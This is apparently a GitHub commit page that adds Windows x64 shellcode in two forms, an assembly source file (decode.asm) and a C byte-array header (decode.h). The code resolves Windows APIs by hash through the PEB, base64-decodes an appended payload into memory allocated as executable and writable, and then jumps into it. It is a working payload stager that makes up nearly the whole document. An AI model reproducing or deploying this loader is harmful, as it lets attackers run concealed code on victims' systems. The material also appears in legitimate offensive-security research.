Skip to content

Commit a48dca0

Browse files
odzhanodzhan
committed
upd
1 parent ebfa771 commit a48dca0

7 files changed

Lines changed: 646 additions & 7 deletions

File tree

os/win/amd64/decode.asm

Lines changed: 161 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,161 @@
1+
;
2+
; Copyright © 2019 Odzhan. All Rights Reserved.
3+
;
4+
; Redistribution and use in source and binary forms, with or without
5+
; modification, are permitted provided that the following conditions are
6+
; met:
7+
;
8+
; 1. Redistributions of source code must retain the above copyright
9+
; notice, this list of conditions and the following disclaimer.
10+
;
11+
; 2. Redistributions in binary form must reproduce the above copyright
12+
; notice, this list of conditions and the following disclaimer in the
13+
; documentation and/or other materials provided with the distribution.
14+
;
15+
; 3. The name of the author may not be used to endorse or promote products
16+
; derived from this software without specific prior written permission.
17+
;
18+
; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
19+
; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
20+
; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
21+
; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
22+
; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
23+
; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
24+
; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
25+
; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
26+
; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
27+
; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
28+
; POSSIBILITY OF SUCH DAMAGE.
29+
;
30+
%include "../include.inc"
31+
32+
bits 64
33+
34+
; shadow or home space for API call
35+
struc home_space
36+
._rcx resq 1
37+
._rdx resq 1
38+
._r8 resq 1
39+
._r9 resq 1
40+
endstruc
41+
42+
; structure for stack allocation
43+
struc ws
44+
.hs resb home_space_size
45+
46+
.arg0 resq 1
47+
.arg1 resq 1
48+
.arg2 resq 1
49+
50+
; local variables
51+
.outlen resd 1
52+
.outbuf resq 1
53+
.inlen resd 1
54+
.inbuf resq 1
55+
56+
; function pointers
57+
58+
; kernel32.dll
59+
._LoadLibraryA resq 1
60+
._lstrlenA resq 1
61+
._VirtualAlloc resq 1
62+
63+
; crypt32.dll
64+
._CryptStringToBinary resq 1
65+
endstruc
66+
67+
%define WORK_SPACE_LEN ((ws_size & -16) + 16) - 8
68+
69+
; save non-volatile registers
70+
pushx rsi, rbx, rdi, rbp
71+
jmp load_get_api
72+
init_get_api:
73+
pop rbp
74+
xor eax, eax
75+
mov al, (decode_main - get_api1)
76+
add rax, rbp
77+
jmp rax
78+
load_get_api:
79+
call init_get_api
80+
81+
%include "getapi1.asm"
82+
83+
decode_main:
84+
; rbp points to get_api1
85+
; rax points to decode_main
86+
cqo
87+
mov dl, (inbuf - decode_main)
88+
add rax, rdx
89+
sub rsp, WORK_SPACE_LEN
90+
push rsp
91+
pop rbx
92+
lea rdi, [rbx + ws.inbuf]
93+
stosq
94+
95+
lookup "kernel32.dll", "LoadLibraryA"
96+
stosq
97+
98+
lookup "kernel32.dll", "lstrlenA"
99+
stosq
100+
101+
lookup "kernel32.dll", "VirtualAlloc"
102+
stosq
103+
104+
lookup "crypt32.dll", "CryptStringToBinaryA"
105+
stosq
106+
107+
; inlen = lstrlenA(inbuf)
108+
xor eax, eax
109+
mov rcx, [rbx + ws.inbuf]
110+
call qword[rbx + ws._lstrlenA]
111+
mov dword[rbx + ws.inlen], eax
112+
113+
; CryptStringToBinary(inbuf, inlen,
114+
; CRYPT_STRING_ANY, NULL, &outlen, NULL, NULL)
115+
xor edx, edx ; edx = 0
116+
mov [rbx + ws.arg2 ], rdx ; NULL
117+
mov [rbx + ws.arg1 ], rdx ; NULL
118+
mov [rbx + ws.outlen ], rdx ; outlen = 0
119+
lea rcx, [rbx + ws.outlen]
120+
mov [rbx + ws.arg0], rcx ; &outlen
121+
xor r9, r9 ; r8 = NULL
122+
push CRYPT_STRING_ANY ; r8 = CRYPT_STRING_ANY
123+
pop r8 ;
124+
xchg eax, edx ; rdx = inlen
125+
mov rcx, [rbx + ws.inbuf]
126+
call qword[rbx + ws._CryptStringToBinary]
127+
128+
; out = VirtualAlloc(NULL, outlen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
129+
push PAGE_EXECUTE_READWRITE
130+
pop r9
131+
push (MEM_COMMIT | MEM_RESERVE) >> 8
132+
pop r8
133+
shl r8, 8
134+
mov edx, [rbx + ws.outlen] ; rdx = outlen
135+
xor ecx, ecx ; rcx = 0
136+
call qword[rbx + ws._VirtualAlloc]
137+
mov qword[rbx + ws.outbuf], rax
138+
139+
; CryptStringToBinary(inbuf, inlen,
140+
; CRYPT_STRING_ANY, outbuf, &outlen, NULL, NULL)
141+
xor edx, edx ; edx = 0
142+
mov [rbx + ws.arg2 ], rdx ; NULL
143+
mov [rbx + ws.arg1 ], rdx ; NULL
144+
lea rcx, [rbx + ws.outlen]
145+
mov [rbx + ws.arg0], rcx ; &outlen
146+
push rax ; r9 = outbuf
147+
pop r9
148+
push CRYPT_STRING_ANY ;
149+
pop r8 ; r8 = CRYPT_STRING_ANY
150+
mov edx, [rbx + ws.inlen] ; rdx = inlen
151+
mov rcx, [rbx + ws.inbuf]
152+
call qword[rbx + ws._CryptStringToBinary]
153+
mov rax, [rbx + ws.outbuf]
154+
155+
add rsp, WORK_SPACE_LEN
156+
popx rsi, rbx, rdi, rbp
157+
jmp rax ; jump to code
158+
159+
inbuf:
160+
; null terminated base64 string
161+

os/win/amd64/decode.h

Lines changed: 155 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,155 @@
1+
2+
// Target architecture : X86 64
3+
4+
#define DECODE_SIZE 353
5+
6+
char DECODE[] = {
7+
/* 0000 */ "\x56" /* push rsi */
8+
/* 0001 */ "\x53" /* push rbx */
9+
/* 0002 */ "\x57" /* push rdi */
10+
/* 0003 */ "\x55" /* push rbp */
11+
/* 0004 */ "\xeb\x0a" /* jmp 0x10 */
12+
/* 0006 */ "\x5d" /* pop rbp */
13+
/* 0007 */ "\x31\xc0" /* xor eax, eax */
14+
/* 0009 */ "\xb0\x9b" /* mov al, 0x9b */
15+
/* 000B */ "\x48\x01\xe8" /* add rax, rbp */
16+
/* 000E */ "\xff\xe0" /* jmp rax */
17+
/* 0010 */ "\xe8\xf1\xff\xff\xff" /* call 6 */
18+
/* 0015 */ "\x56" /* push rsi */
19+
/* 0016 */ "\x53" /* push rbx */
20+
/* 0017 */ "\x57" /* push rdi */
21+
/* 0018 */ "\x55" /* push rbp */
22+
/* 0019 */ "\x41\x89\xc0" /* mov r8d, eax */
23+
/* 001C */ "\xeb\x72" /* jmp 0x90 */
24+
/* 001E */ "\x41\x59" /* pop r9 */
25+
/* 0020 */ "\x6a\x60" /* push 0x60 */
26+
/* 0022 */ "\x41\x5b" /* pop r11 */
27+
/* 0024 */ "\x65\x49\x8b\x03" /* mov rax, qword ptr gs:[r11] */
28+
/* 0028 */ "\x48\x8b\x40\x18" /* mov rax, qword ptr [rax + 0x18] */
29+
/* 002C */ "\x48\x8b\x78\x10" /* mov rdi, qword ptr [rax + 0x10] */
30+
/* 0030 */ "\xeb\x03" /* jmp 0x35 */
31+
/* 0032 */ "\x48\x8b\x3f" /* mov rdi, qword ptr [rdi] */
32+
/* 0035 */ "\x48\x8b\x5f\x30" /* mov rbx, qword ptr [rdi + 0x30] */
33+
/* 0039 */ "\x48\x85\xdb" /* test rbx, rbx */
34+
/* 003C */ "\x74\x4b" /* je 0x89 */
35+
/* 003E */ "\x8b\x73\x3c" /* mov esi, dword ptr [rbx + 0x3c] */
36+
/* 0041 */ "\x44\x01\xde" /* add esi, r11d */
37+
/* 0044 */ "\x8b\x4c\x33\x28" /* mov ecx, dword ptr [rbx + rsi + 0x28] */
38+
/* 0048 */ "\x67\xe3\xe7" /* jecxz 0x32 */
39+
/* 004B */ "\x48\x8d\x74\x0b\x0c" /* lea rsi, qword ptr [rbx + rcx + 0xc] */
40+
/* 0050 */ "\xad" /* lodsd eax, dword ptr [rsi] */
41+
/* 0051 */ "\x41\xff\xd1" /* call r9 */
42+
/* 0054 */ "\x50" /* push rax */
43+
/* 0055 */ "\x41\x5a" /* pop r10 */
44+
/* 0057 */ "\xad" /* lodsd eax, dword ptr [rsi] */
45+
/* 0058 */ "\xad" /* lodsd eax, dword ptr [rsi] */
46+
/* 0059 */ "\xad" /* lodsd eax, dword ptr [rsi] */
47+
/* 005A */ "\x91" /* xchg eax, ecx */
48+
/* 005B */ "\x67\xe3\xd4" /* jecxz 0x32 */
49+
/* 005E */ "\xad" /* lodsd eax, dword ptr [rsi] */
50+
/* 005F */ "\x92" /* xchg eax, edx */
51+
/* 0060 */ "\x48\x01\xda" /* add rdx, rbx */
52+
/* 0063 */ "\xad" /* lodsd eax, dword ptr [rsi] */
53+
/* 0064 */ "\x95" /* xchg eax, ebp */
54+
/* 0065 */ "\x48\x01\xdd" /* add rbp, rbx */
55+
/* 0068 */ "\xad" /* lodsd eax, dword ptr [rsi] */
56+
/* 0069 */ "\x96" /* xchg eax, esi */
57+
/* 006A */ "\x48\x01\xde" /* add rsi, rbx */
58+
/* 006D */ "\x48\x8b\x44\x8d\xfc" /* mov rax, qword ptr [rbp + rcx*4 - 4] */
59+
/* 0072 */ "\x41\xff\xd1" /* call r9 */
60+
/* 0075 */ "\x44\x01\xd0" /* add eax, r10d */
61+
/* 0078 */ "\x44\x39\xc0" /* cmp eax, r8d */
62+
/* 007B */ "\xe0\xf0" /* loopne 0x6d */
63+
/* 007D */ "\x75\xb3" /* jne 0x32 */
64+
/* 007F */ "\x0f\xb7\x04\x4e" /* movzx eax, word ptr [rsi + rcx*2] */
65+
/* 0083 */ "\x8b\x04\x82" /* mov eax, dword ptr [rdx + rax*4] */
66+
/* 0086 */ "\x48\x01\xc3" /* add rbx, rax */
67+
/* 0089 */ "\x48\x93" /* xchg rax, rbx */
68+
/* 008B */ "\x5d" /* pop rbp */
69+
/* 008C */ "\x5f" /* pop rdi */
70+
/* 008D */ "\x5b" /* pop rbx */
71+
/* 008E */ "\x5e" /* pop rsi */
72+
/* 008F */ "\xc3" /* ret */
73+
/* 0090 */ "\xe8\x89\xff\xff\xff" /* call 0x1e */
74+
/* 0095 */ "\x52" /* push rdx */
75+
/* 0096 */ "\x56" /* push rsi */
76+
/* 0097 */ "\x96" /* xchg eax, esi */
77+
/* 0098 */ "\x48\x01\xde" /* add rsi, rbx */
78+
/* 009B */ "\x31\xc0" /* xor eax, eax */
79+
/* 009D */ "\x99" /* cdq */
80+
/* 009E */ "\xac" /* lodsb al, byte ptr [rsi] */
81+
/* 009F */ "\x08\xc0" /* or al, al */
82+
/* 00A1 */ "\x74\x09" /* je 0xac */
83+
/* 00A3 */ "\x0c\x20" /* or al, 0x20 */
84+
/* 00A5 */ "\x01\xc2" /* add edx, eax */
85+
/* 00A7 */ "\xc1\xca\x08" /* ror edx, 8 */
86+
/* 00AA */ "\xeb\xf2" /* jmp 0x9e */
87+
/* 00AC */ "\x92" /* xchg eax, edx */
88+
/* 00AD */ "\x5e" /* pop rsi */
89+
/* 00AE */ "\x5a" /* pop rdx */
90+
/* 00AF */ "\xc3" /* ret */
91+
/* 00B0 */ "\x48\x99" /* cqo */
92+
/* 00B2 */ "\xb2\xb1" /* mov dl, 0xb1 */
93+
/* 00B4 */ "\x48\x01\xd0" /* add rax, rdx */
94+
/* 00B7 */ "\x48\x83\xec\x78" /* sub rsp, 0x78 */
95+
/* 00BB */ "\x54" /* push rsp */
96+
/* 00BC */ "\x5b" /* pop rbx */
97+
/* 00BD */ "\x48\x8d\x7b\x48" /* lea rdi, qword ptr [rbx + 0x48] */
98+
/* 00C1 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
99+
/* 00C3 */ "\xb8\x39\x81\x4f\x45" /* mov eax, 0x454f8139 */
100+
/* 00C8 */ "\xff\xd5" /* call rbp */
101+
/* 00CA */ "\x48\xab" /* stosq qword ptr [rdi], rax */
102+
/* 00CC */ "\xb8\xd7\x0e\xf5\xe0" /* mov eax, 0xe0f50ed7 */
103+
/* 00D1 */ "\xff\xd5" /* call rbp */
104+
/* 00D3 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
105+
/* 00D5 */ "\xb8\x57\x6d\x60\x46" /* mov eax, 0x46606d57 */
106+
/* 00DA */ "\xff\xd5" /* call rbp */
107+
/* 00DC */ "\x48\xab" /* stosq qword ptr [rdi], rax */
108+
/* 00DE */ "\xb8\xb1\x64\x4a\x3f" /* mov eax, 0x3f4a64b1 */
109+
/* 00E3 */ "\xff\xd5" /* call rbp */
110+
/* 00E5 */ "\x48\xab" /* stosq qword ptr [rdi], rax */
111+
/* 00E7 */ "\x31\xc0" /* xor eax, eax */
112+
/* 00E9 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
113+
/* 00ED */ "\xff\x53\x58" /* call qword ptr [rbx + 0x58] */
114+
/* 00F0 */ "\x89\x43\x44" /* mov dword ptr [rbx + 0x44], eax */
115+
/* 00F3 */ "\x31\xd2" /* xor edx, edx */
116+
/* 00F5 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
117+
/* 00F9 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
118+
/* 00FD */ "\x48\x89\x53\x38" /* mov qword ptr [rbx + 0x38], rdx */
119+
/* 0101 */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
120+
/* 0105 */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
121+
/* 0109 */ "\x4d\x31\xc9" /* xor r9, r9 */
122+
/* 010C */ "\x6a\x07" /* push 7 */
123+
/* 010E */ "\x41\x58" /* pop r8 */
124+
/* 0110 */ "\x92" /* xchg eax, edx */
125+
/* 0111 */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
126+
/* 0115 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
127+
/* 0118 */ "\x6a\x40" /* push 0x40 */
128+
/* 011A */ "\x41\x59" /* pop r9 */
129+
/* 011C */ "\x6a\x30" /* push 0x30 */
130+
/* 011E */ "\x41\x58" /* pop r8 */
131+
/* 0120 */ "\x49\xc1\xe0\x08" /* shl r8, 8 */
132+
/* 0124 */ "\x8b\x53\x38" /* mov edx, dword ptr [rbx + 0x38] */
133+
/* 0127 */ "\x31\xc9" /* xor ecx, ecx */
134+
/* 0129 */ "\xff\x53\x60" /* call qword ptr [rbx + 0x60] */
135+
/* 012C */ "\x48\x89\x43\x3c" /* mov qword ptr [rbx + 0x3c], rax */
136+
/* 0130 */ "\x31\xd2" /* xor edx, edx */
137+
/* 0132 */ "\x48\x89\x53\x30" /* mov qword ptr [rbx + 0x30], rdx */
138+
/* 0136 */ "\x48\x89\x53\x28" /* mov qword ptr [rbx + 0x28], rdx */
139+
/* 013A */ "\x48\x8d\x4b\x38" /* lea rcx, qword ptr [rbx + 0x38] */
140+
/* 013E */ "\x48\x89\x4b\x20" /* mov qword ptr [rbx + 0x20], rcx */
141+
/* 0142 */ "\x50" /* push rax */
142+
/* 0143 */ "\x41\x59" /* pop r9 */
143+
/* 0145 */ "\x6a\x07" /* push 7 */
144+
/* 0147 */ "\x41\x58" /* pop r8 */
145+
/* 0149 */ "\x8b\x53\x44" /* mov edx, dword ptr [rbx + 0x44] */
146+
/* 014C */ "\x48\x8b\x4b\x48" /* mov rcx, qword ptr [rbx + 0x48] */
147+
/* 0150 */ "\xff\x53\x68" /* call qword ptr [rbx + 0x68] */
148+
/* 0153 */ "\x48\x8b\x43\x3c" /* mov rax, qword ptr [rbx + 0x3c] */
149+
/* 0157 */ "\x48\x83\xc4\x78" /* add rsp, 0x78 */
150+
/* 015B */ "\x5d" /* pop rbp */
151+
/* 015C */ "\x5f" /* pop rdi */
152+
/* 015D */ "\x5b" /* pop rbx */
153+
/* 015E */ "\x5e" /* pop rsi */
154+
/* 015F */ "\xff\xe0" /* jmp rax */
155+
};

0 commit comments

Comments
 (0)